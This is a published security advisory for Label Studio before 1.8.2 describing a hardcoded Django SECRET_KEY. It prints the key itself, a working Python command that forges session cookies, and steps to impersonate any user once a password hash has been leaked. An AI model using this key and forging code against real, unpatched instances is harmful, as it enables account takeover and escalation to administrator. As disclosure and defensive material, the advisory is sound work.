GHSA-f475-x83m-rx5m

Suggest an improvement
Source
https://github.com/advisories/GHSA-f475-x83m-rx5m
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/11/GHSA-f475-x83m-rx5m/GHSA-f475-x83m-rx5m.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-f475-x83m-rx5m
Aliases
Published
2023-11-09T14:42:58Z
Modified
2024-11-22T18:03:34.660124Z
Severity
  • 9.8 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
Summary
Label Studio has Hardcoded Django `SECRET_KEY` that can be Abused to Forge Session Tokens
Details

Introduction

This write-up describes a vulnerability found in Label Studio, a popular open source data labeling tool. The vulnerability was found to affect versions before 1.8.2, where a patch was introduced.

Overview

In Label Studio version 1.8.1, a hard coded Django SECRET_KEY was set in the application settings. The Django SECRET_KEY is used for signing session tokens by the web application framework, and should never be shared with unauthorised parties.

However, the Django framework inserts a _auth_user_hash claim in the session token that is a HMAC hash of the account's password hash. That claim would normally prevent forging a valid Django session token without knowing the password hash of the account. However, any authenticated user can exploit an Object Relational Mapper (ORM) Leak vulnerability in Label Studio to leak the password hash of any account on the platform, which is reported as a separate vulnerability. An attacker can exploit the ORM Leak vulnerability (which was patched in 1.9.2post0) and forge session tokens for all users on Label Studio using the hard coded SECRET_KEY.

Description

Below is the code snippet of the Django settings file at label_studio/core/settings/base.py.

# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '$(fefwefwef13;LFK{P!)@#*!)kdsjfWF2l+i5e3t(8a1n'

This secret is hard coded across all instances of Label Studio.

Proof of Concept

Below are the steps that an attacker could do to forge a session token of any account on Label Studio:

  1. Exploit the ORM Leak vulnerability (patched in 1.9.2post0) in Label Studio to retrieve the full password hash that will be impersonated. For this example, a session token will be forged for an account with the email ghostccamm@testvm.local with the password hash pbkdf2_sha256$260000$KKeew1othBwMKk2QudmEgb$ALiopdBpWMwMDD628xeE1Ie7YSsKxdXdvWfo/PvVXvw= that was retrieved.

  2. Create a new Django project with an empty application. In cookieforge/cookieforge/settings.py set the SECRET_KEY to $(fefwefwef13;LFK{P!)@#*!)kdsjfWF2l+i5e3t(8a1n. Create a management command with the following code that will be used to create forged session tokens.

    from typing import Any
    from django.core.management.base import  BaseCommand, CommandParser
    from django.core import signing
    from django.utils.crypto import salted_hmac
    from django.conf import settings
    import time, uuid
    
    class Command(BaseCommand):
        help = "Forge a users session cookie on Label Studio"
    
        def add_arguments(self, parser: CommandParser) -> None:
            parser.add_argument(
                '-o', '--organisation',
                help='Organisation ID to access',
                default=1,
                type=int
            )
    
            parser.add_argument(
                'user_id',
                help='The User ID of the victim you want to impersonate',
                type=str
            )
    
            parser.add_argument(
                'user_hash',
                help='The password hash the user you want to impersonate'
            )
    
        def handle(self, *args: Any, **options: Any) -> str | None:
            key = settings.SECRET_KEY
            # Creates the _auth_user_hash HMAC of the victim's password hash
            auth_user_hash = salted_hmac(
                'django.contrib.auth.models.AbstractBaseUser.get_session_auth_hash',
                options['user_hash'],
                secret=key,
                algorithm="sha256"
            ).hexdigest()
    
            session_dict = {
                'uid': str(uuid.uuid4()), 
                'organization_pk': options['organisation'], 
                'next_page': '/projects/', 
                'last_login': time.time(), 
                '_auth_user_id': options['user_id'], 
                '_auth_user_backend': 
                'django.contrib.auth.backends.ModelBackend', 
                '_auth_user_hash': auth_user_hash, 
                'keep_me_logged_in': True, 
                '_session_expiry': 600
            }
    
            # Creates a forged session token
            session_token = signing.dumps(
                session_dict,
                key=key,
                salt="django.contrib.sessions.backends.signed_cookies",
                compress=True
            )
    
            self.stdout.write(
                self.style.SUCCESS(f"session token: {session_token}")
            )
    
  3. Next run the following command replacing the {user_id} with the user ID of the account you want to the impersonate and {user_hash} with the victim's password hash. Copy the session token that is printed.

    python3 manage.py forgecookie {user_id} '{user_hash}'
    
  4. Change the sessionid cookie on the browser and refresh the page. Observe being authenticated as the victim user.

Impact

This vulnerability can be chained with the ORM Leak vulnerability (which was patched in 1.9.2post0) in Label Studio to impersonate any account on Label Studio. An attacker could exploit these vulnerabilities to escalate their privileges from a low privilege user to a Django Super Administrator user.

Remediation Advice

It is important to note that the hard coded SECRET_KEY has already been removed in Label Studio versions >=1.8.2. However, there has not been any public disclosure about the use of the hard coded secret key and users have not been informed about the security vulnerability.

We recommend that Human Signal to release a public disclosure about the hard coded SECRET_KEY to encourage users to patch to a version >=1.8.2 to mitigate the likelihood of an attacker exploiting these vulnerabilities to impersonate all accounts on the platform.

Discovered

  • August 2023, Robert Schuh, @robbilie
  • August 2023, Alex Brown, elttam
Database specific
{
    "nvd_published_at": "2023-11-09T15:15:08Z",
    "cwe_ids": [
        "CWE-200"
    ],
    "severity": "CRITICAL",
    "github_reviewed": true,
    "github_reviewed_at": "2023-11-09T14:42:58Z"
}
References

Affected packages

PyPI / label-studio

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
1.8.2

Affected versions

0.*

0.4.1
0.4.2
0.4.3
0.4.4
0.4.4.post1
0.4.4.post2
0.4.5
0.4.6
0.4.6.post1
0.4.6.post2
0.4.7
0.4.8
0.5.0
0.5.1
0.6.0
0.6.1
0.7.0
0.7.1
0.7.2
0.7.3
0.7.4
0.7.4.post0
0.7.4.post1
0.7.5.post1
0.7.5.post2
0.8.0
0.8.0.post0
0.8.1
0.8.1.post0
0.8.2
0.8.2.post0
0.9.0
0.9.0.post2
0.9.0.post3
0.9.0.post4
0.9.0.post5
0.9.1
0.9.1.post0
0.9.1.post1
0.9.1.post2

1.*

1.0.0
1.0.0.post0
1.0.0.post1
1.0.0.post2
1.0.0.post3
1.0.1
1.0.2
1.0.2.post0
1.1.0rc0
1.1.0
1.1.1
1.2
1.3
1.3.post0
1.3.post1
1.4
1.4.1
1.4.1.post0
1.4.1.post1
1.5.0
1.5.0.post0
1.6.0
1.7.0
1.7.1
1.7.2
1.7.3
1.8.0
1.8.1